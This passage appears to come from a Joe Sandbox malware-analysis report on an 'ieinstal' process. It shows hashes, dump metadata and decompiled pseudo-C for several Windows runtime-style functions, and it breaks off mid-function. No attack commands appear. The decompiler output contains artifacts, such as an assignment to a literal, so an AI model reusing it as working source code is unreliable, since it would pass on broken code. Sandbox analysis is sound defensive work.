                                                            0x1ecc6e05
                                                            0x1ecc6e09
                                                            0x1ecc6e0d
                                                            0x1ecc6e11
                                                            0x1ecc6e11
                                                            0x1ec851eb
                                                            0x1ecc6e1a
                                                            0x1ecc6e1f
                                                            0x1ecc6e21
                                                            0x1ecc6e23
                                                            0x00000000
                                                            0x1ec851f1
                                                            0x1ec851f1
                                                            0x00000000
                                                            0x1ec851f1

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10a18dccbcbdb307e37558a7a0ced20ddd192fcb55cbd4cff4d58b0f25436bc3
                                                            • Instruction ID: 13095d606204da00c3051efb08046951a9f2661ed60723d1099fd71eabbe05a1
                                                            • Opcode Fuzzy Hash: 10a18dccbcbdb307e37558a7a0ced20ddd192fcb55cbd4cff4d58b0f25436bc3
                                                            • Instruction Fuzzy Hash: 72C123755083818FD354CF29C990A5AFBF2BF88708F148A6EF8998B352D771E945CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC803E2 Relevance: .3, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E1EC803E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x1ed4d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E1EC80548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E1EC9B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E1EC6B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1ed47c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E1EC77D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E1EC77D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E1ECD7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E1EC99830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E1ECD69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1ed47c04 != 0) {
						_t118 = _v12;
						_t120 = E1ECDA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1ed47bd8;
						if( *0x1ed47bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E1EC995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E1EC999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E1ECD3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E1EC5B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E1EC9AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1ed48474 - 3;
										if( *0x1ed48474 != 3) {
											 *0x1ed479dc =  *0x1ed479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E1EC77D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E1EC77D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E1ECD7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1ed48708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1ed47b00; // 0x0
							asm("ror esi, cl");
							 *0x1ed4b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E1EC995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E1EC67F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                            0x1ec803f1
                                                            0x1ec803f7
                                                            0x1ec803f9
                                                            0x1ec803fb
                                                            0x1ec803fd
                                                            0x1ec80400
                                                            0x1ec8040a
                                                            0x1ecc4c7a
                                                            0x1ec80537
                                                            0x1ec80547
                                                            0x1ec80410
                                                            0x1ec80410
                                                            0x1ec80414
                                                            0x1ec80417
                                                            0x1ec8041a
                                                            0x1ec80421
                                                            0x1ec80424
                                                            0x1ec8042b
                                                            0x1ec8043b
                                                            0x1ec8043e
                                                            0x1ec8043f
                                                            0x1ec8043f
                                                            0x1ec80446
                                                            0x1ec80449
                                                            0x1ec8044c
                                                            0x1ec8044f
                                                            0x1ec80459
                                                            0x1ecc4c8d
                                                            0x1ec8045f
                                                            0x1ec8045f
                                                            0x1ec8045f
                                                            0x1ec80467
                                                            0x1ecc4c97
                                                            0x1ecc4c9d
                                                            0x1ecc4ca4
                                                            0x1ecc4caa
                                                            0x1ecc4caf
                                                            0x1ecc4cb1
                                                            0x1ecc4cc3
                                                            0x1ecc4cb3
                                                            0x1ecc4cbc
                                                            0x1ecc4cbc
                                                            0x1ecc4cc8
                                                            0x1ecc4ccb
                                                            0x1ecc4cd7
                                                            0x1ecc4cda
                                                            0x1ecc4cdf
                                                            0x1ecc4cdf
                                                            0x1ecc4ccb
                                                            0x1ecc4ca4
                                                            0x1ec8046d
                                                            0x1ec8046f
                                                            0x1ec8046f
                                                            0x1ec80471
                                                            0x1ec80476
                                                            0x1ec8047a
                                                            0x1ec8047b
                                                            0x1ec80483
                                                            0x1ec80489
                                                            0x1ec8048d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4ce9
                                                            0x1ecc4cef
                                                            0x1ecc4d22
                                                            0x1ecc4d22
                                                            0x00000000
                                                            0x1ecc4d22
                                                            0x1ecc4cf1
                                                            0x1ecc4cf7
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4cf9
                                                            0x1ecc4cff
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d05
                                                            0x1ecc4d07
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d0d
                                                            0x1ecc4d0f
                                                            0x1ecc4d14
                                                            0x1ecc4d16
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d1c
                                                            0x1ecc4d1c
                                                            0x1ec80499
                                                            0x1ec80535
                                                            0x1ec80535
                                                            0x00000000
                                                            0x1ec80535
                                                            0x1ec804a6
                                                            0x1ecc4d2c
                                                            0x1ecc4d37
                                                            0x1ecc4d39
                                                            0x1ecc4d3b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d41
                                                            0x1ecc4d48
                                                            0x1ec80527
                                                            0x1ec8052b
                                                            0x1ec8052d
                                                            0x1ec80530
                                                            0x1ec80530
                                                            0x00000000
                                                            0x1ec8052b
                                                            0x1ecc4d4e
                                                            0x1ec804ac
                                                            0x1ec804ac
                                                            0x1ec804af
                                                            0x1ec804b2
                                                            0x1ec804b7
                                                            0x1ec804b9
                                                            0x1ec804bb
                                                            0x1ec804bd
                                                            0x1ec804bf
                                                            0x1ec804c5
                                                            0x1ec804c9
                                                            0x1ecc4d53
                                                            0x1ecc4d59
                                                            0x1ecc4db9
                                                            0x1ecc4dba
                                                            0x1ecc4dbf
                                                            0x1ecc4dc2
                                                            0x1ecc4dc4
                                                            0x1ecc4dc7
                                                            0x1ecc4dce
                                                            0x00000000
                                                            0x1ecc4dce
                                                            0x1ecc4d5b
                                                            0x1ecc4d61
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d63
                                                            0x1ecc4d69
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4d6b
                                                            0x1ecc4d6e
                                                            0x1ecc4d74
                                                            0x1ecc4d76
                                                            0x1ecc4d7c
                                                            0x1ecc4d7e
                                                            0x1ecc4d84
                                                            0x1ecc4d89
                                                            0x1ecc4d8c
                                                            0x1ecc4d8d
                                                            0x1ecc4d92
                                                            0x1ecc4d95
                                                            0x1ecc4d96
                                                            0x1ecc4d98
                                                            0x1ecc4d9a
                                                            0x1ecc4d9f
                                                            0x1ecc4da4
                                                            0x1ecc4da6
                                                            0x1ecc4da8
                                                            0x1ecc4daf
                                                            0x1ecc4db1
                                                            0x1ecc4db1
                                                            0x1ecc4daf
                                                            0x1ecc4da6
                                                            0x1ecc4d84
                                                            0x1ecc4d7c
                                                            0x00000000
                                                            0x1ecc4d74
                                                            0x1ec804d6
                                                            0x1ecc4de1
                                                            0x1ec804dc
                                                            0x1ec804dc
                                                            0x1ec804dc
                                                            0x1ec804e4
                                                            0x1ecc4deb
                                                            0x1ecc4df1
                                                            0x1ecc4df8
                                                            0x1ecc4dfe
                                                            0x1ecc4e03
                                                            0x1ecc4e05
                                                            0x1ecc4e17
                                                            0x1ecc4e07
                                                            0x1ecc4e10
                                                            0x1ecc4e10
                                                            0x1ecc4e1c
                                                            0x1ecc4e1f
                                                            0x1ecc4e35
                                                            0x1ecc4e35
                                                            0x1ecc4e1f
                                                            0x1ecc4df8
                                                            0x1ec804f1
                                                            0x1ec804fa
                                                            0x1ecc4e3f
                                                            0x1ecc4e47
                                                            0x1ecc4e5b
                                                            0x1ecc4e61
                                                            0x1ecc4e67
                                                            0x1ecc4e69
                                                            0x1ecc4e71
                                                            0x1ecc4e73
                                                            0x1ec80500
                                                            0x1ec80500
                                                            0x1ec80500
                                                            0x1ec804fa
                                                            0x1ec80508
                                                            0x1ec8051d
                                                            0x1ec8051d
                                                            0x1ec8051f
                                                            0x1ec80524
                                                            0x00000000
                                                            0x1ec80524
                                                            0x1ec80515
                                                            0x1ec80517
                                                            0x1ecc4e7a
                                                            0x1ecc4e7c
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4e85
                                                            0x00000000
                                                            0x1ecc4e85
                                                            0x00000000
                                                            0x1ec80517

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7502eaf43e1b3721f28223522157d7a942aeb20b9bd09de9c0590488117a3bdc
                                                            • Instruction ID: c3c17b58da751d61cf0488a67a4bc5bf922440172bb3b4fd41d81379bd2f5eae
                                                            • Opcode Fuzzy Hash: 7502eaf43e1b3721f28223522157d7a942aeb20b9bd09de9c0590488117a3bdc
                                                            • Instruction Fuzzy Hash: 32916A32E006999FFB218B69CD45F9EBBA5BF01728F014365ED11AB2D4DB74AC40C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC86A60 Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 66%
                                                            			E1EC86A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0x1ed4d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E1EC99810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0x1ed46908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E1EC9CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E1EC9CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E1EC9D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E1EC9B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E1EC9AA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E1EC9D000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E1EC9AA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                            0x1ec86a6f
                                                            0x1ec86a72
                                                            0x1ec86a78
                                                            0x1ec86a7c
                                                            0x1ec86a7f
                                                            0x1ec86a87
                                                            0x1ecc8049
                                                            0x1ecc8049
                                                            0x1ecc804e
                                                            0x1ecc804f
                                                            0x1ecc8057
                                                            0x1ecc805c
                                                            0x00000000
                                                            0x1ec86a8d
                                                            0x1ec86a92
                                                            0x1ec86a92
                                                            0x1ec86a94
                                                            0x1ec86a99
                                                            0x1ec86a9c
                                                            0x1ec86a9f
                                                            0x1ec86aa2
                                                            0x1ec86aaa
                                                            0x1ec86ab0
                                                            0x1ecc7eae
                                                            0x1ecc7eb4
                                                            0x1ecc7eb9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ebf
                                                            0x1ecc7ebf
                                                            0x1ecc7ebf
                                                            0x1ecc7ec1
                                                            0x1ecc7ec6
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7ece
                                                            0x1ecc7edb
                                                            0x1ecc7ee5
                                                            0x1ecc7ee7
                                                            0x1ecc7ee7
                                                            0x1ecc7edd
                                                            0x1ecc7edd
                                                            0x1ecc7edd
                                                            0x1ecc7eea
                                                            0x1ecc7ed0
                                                            0x1ecc7ed0
                                                            0x1ecc7ed3
                                                            0x1ecc7ed3
                                                            0x1ecc7eec
                                                            0x1ecc7ef8
                                                            0x1ecc7f00
                                                            0x1ecc7f07
                                                            0x1ecc7f0a
                                                            0x1ecc7f19
                                                            0x1ecc7f1b
                                                            0x1ecc7f23
                                                            0x1ecc7f25
                                                            0x1ecc7f28
                                                            0x1ecc7f2e
                                                            0x1ecc7f31
                                                            0x1ecc7f34
                                                            0x1ecc7f37
                                                            0x1ecc7f3c
                                                            0x00000000
                                                            0x1ecc7f3e
                                                            0x1ecc7f3e
                                                            0x1ecc7f41
                                                            0x1ec86b35
                                                            0x1ec86b38
                                                            0x1ec86b44
                                                            0x1ec86b4c
                                                            0x1ec86b4e
                                                            0x1ec86b51
                                                            0x1ec86b69
                                                            0x1ec86b69
                                                            0x1ecc7f3c
                                                            0x1ecc8046
                                                            0x00000000
                                                            0x1ecc8046
                                                            0x1ec86abc
                                                            0x1ec86aca
                                                            0x1ecc7f49
                                                            0x1ec86b13
                                                            0x1ec86b13
                                                            0x1ec86b16
                                                            0x1ec86b1e
                                                            0x1ecc7fe7
                                                            0x1ecc7fea
                                                            0x1ecc7fed
                                                            0x1ecc7ff0
                                                            0x1ecc7ff2
                                                            0x1ecc7ff4
                                                            0x1ecc7ffa
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc8000
                                                            0x1ecc8003
                                                            0x1ecc8006
                                                            0x1ecc8009
                                                            0x1ecc800b
                                                            0x1ecc800d
                                                            0x1ecc8010
                                                            0x1ecc801f
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc8025
                                                            0x1ec86b2f
                                                            0x1ec86b2f
                                                            0x1ec86b32
                                                            0x00000000
                                                            0x1ec86b32
                                                            0x1ec86b26
                                                            0x1ecc8030
                                                            0x1ecc803a
                                                            0x1ecc803c
                                                            0x1ecc803c
                                                            0x1ecc8032
                                                            0x1ecc8032
                                                            0x1ecc8032
                                                            0x1ecc803f
                                                            0x1ec86b2c
                                                            0x1ec86b2c
                                                            0x1ec86b2c
                                                            0x00000000
                                                            0x1ec86b26
                                                            0x1ec86ad0
                                                            0x1ec86ad6
                                                            0x1ec86ade
                                                            0x1ec86ae0
                                                            0x1ec86ae0
                                                            0x1ec86ae5
                                                            0x1ecc7f53
                                                            0x1ec86aeb
                                                            0x1ec86aeb
                                                            0x1ec86aeb
                                                            0x1ec86af3
                                                            0x1ecc7f5e
                                                            0x1ecc7f61
                                                            0x1ecc7f68
                                                            0x1ecc7f69
                                                            0x1ecc7f6b
                                                            0x1ecc7f70
                                                            0x1ecc7f71
                                                            0x1ecc7f76
                                                            0x1ecc7f77
                                                            0x1ecc7f7c
                                                            0x1ecc7f86
                                                            0x1ecc7f88
                                                            0x1ecc7f8d
                                                            0x1ecc7f92
                                                            0x1ecc7f97
                                                            0x1ecc7f98
                                                            0x1ecc7f99
                                                            0x1ecc7f9a
                                                            0x1ecc7f9f
                                                            0x1ecc7fa0
                                                            0x1ecc7fa5
                                                            0x1ecc7faa
                                                            0x1ecc7faa
                                                            0x1ecc7faf
                                                            0x1ecc7fdc
                                                            0x1ecc7fdf
                                                            0x00000000
                                                            0x1ecc7fb1
                                                            0x1ecc7fb1
                                                            0x1ecc7fb3
                                                            0x1ecc7fb8
                                                            0x1ecc7fd4
                                                            0x1ecc7fd4
                                                            0x00000000
                                                            0x1ecc7fd4
                                                            0x1ecc7fba
                                                            0x1ecc7fbc
                                                            0x1ecc7fc2
                                                            0x1ecc7fc4
                                                            0x1ecc7fc4
                                                            0x1ecc7fc7
                                                            0x1ecc7fcb
                                                            0x1ecc7fcc
                                                            0x1ecc7fd1
                                                            0x00000000
                                                            0x1ecc7fd1
                                                            0x1ec86b04
                                                            0x1ec86b04
                                                            0x1ec86b0b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec86b11
                                                            0x00000000
                                                            0x1ec86b11
                                                            0x1ec86af3

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 334180634c895427357345b84f82cf87bd1777a89802833d2e5067f44bd55c61
                                                            • Instruction ID: 1406efafee81469021aa4cf1179a895b837a5d6ec02eafa30cb0d082f534724d
                                                            • Opcode Fuzzy Hash: 334180634c895427357345b84f82cf87bd1777a89802833d2e5067f44bd55c61
                                                            • Instruction Fuzzy Hash: 1F819176E002599FCB10CFA9C991BEEBBF6EF48314F148169E954AB344D735AC41CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5C600 Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E1EC5C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x1ed4d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E1EC66D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E1EC9B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1ed47b9c; // 0x0
					_t74 = L1EC74620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E1EC99650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
